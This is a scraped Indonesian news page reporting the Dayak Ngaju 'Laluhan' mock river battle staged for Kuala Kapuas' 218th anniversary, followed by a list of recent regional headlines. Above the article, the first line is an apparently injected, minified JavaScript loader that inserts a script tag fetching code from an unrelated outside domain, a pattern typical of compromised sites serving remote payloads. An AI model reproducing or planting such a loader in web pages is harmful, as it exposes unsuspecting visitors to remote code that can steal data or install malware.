(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Atraksi Ritual Laluhan Warnai Hari Jadi ke-218 Kota Kuala Kapuas


KANALKALIMANTAN.COM, KUALA KAPUAS – Atraksi budaya ritual Laluhan Suku Dayak Ngaju ditampilkan memeriahkan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang Tahun ke-73 Kabupaten Kapuas, Senin (29/4/2024) siang.

Ritual budaya Laluhan yang dikemas sebagai perang di sungai menggunakan tombak imitasi dari tanaman batang tanaman suli dipusatkan di Dermaga Danumare Daerah aliran Sungai (DAS) Kapuas, di Kecamatan Selat.

Prosesi ritual atraksi budaya ini berlangsung seru dan meriah, sejumlah armada kapal-kapal
berlabuh dari kawasan rumah adat Betang Sungai Pasah, Kecamatan Kapuas Hilir.

Perahu yang melintas ditumpangi Pj Bupati dan Forkopimda, para pejabat dan tokoh adat penuh dengan berbagai hiasan ornamen budaya Suku Dayak Ngaju.

Kapal-kapal tersebut melintas di depan Dermaga Danumare, sementara di dermaga itu sendiri sudah ditunggu sejumlah pejabat, tokoh adat, dan warga lainnya.

Pada saat kapal berjarak sekira 25 meter dari dermaga maka perang-perangan dimulai saling serang dan saling lempar antara penumpang kapal dan undangan yang berada di dermaga. Atraksi budaya ini diwarnai penuh dengan kegembiraan dan keriangan.

Ritual Laluhan ini mendapat perhatian warga. Ribuan masyarakat Kota Kuala Kapuas tumpah ruah memadati Dermaga Danumare menyaksikan keseruan atraksi budaya tersebut.

Damang Kepala Adat Kecamatan Selat, Manli D Apil yang memimpin ritual mengatakan, Laluhan ini merupakan tradisi masyarakat Dayak yang masih dilestarikan masyarakat Kabupaten Kapuas.

“Hari ini kita memeriahkan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang Tahun ke-73 Kabupaten Kapuas,” kata Manli.

Menurut Manli, Laluhan dari kata Laluh yang berarti pemberian yang diantarkan menggunakan perahu menggambarkan semangat gotong royong dan kebersamaan.

Atraksi budaya Laluhan ini sebagai simbol kegigihan warga Dayak memerangi kemiskinan dan keterbelakangan, agar dapat menjadi masyarakat yang maju dan mendukung upaya pembangunan. (Kanalkalimantan.com/ags)

Reporter : ags
Editor : kk


Muhammad Andi

Recent Posts

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

2 menit ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

1 jam ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

2 jam ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

2 jam ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

4 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

4 jam ago

This website uses cookies.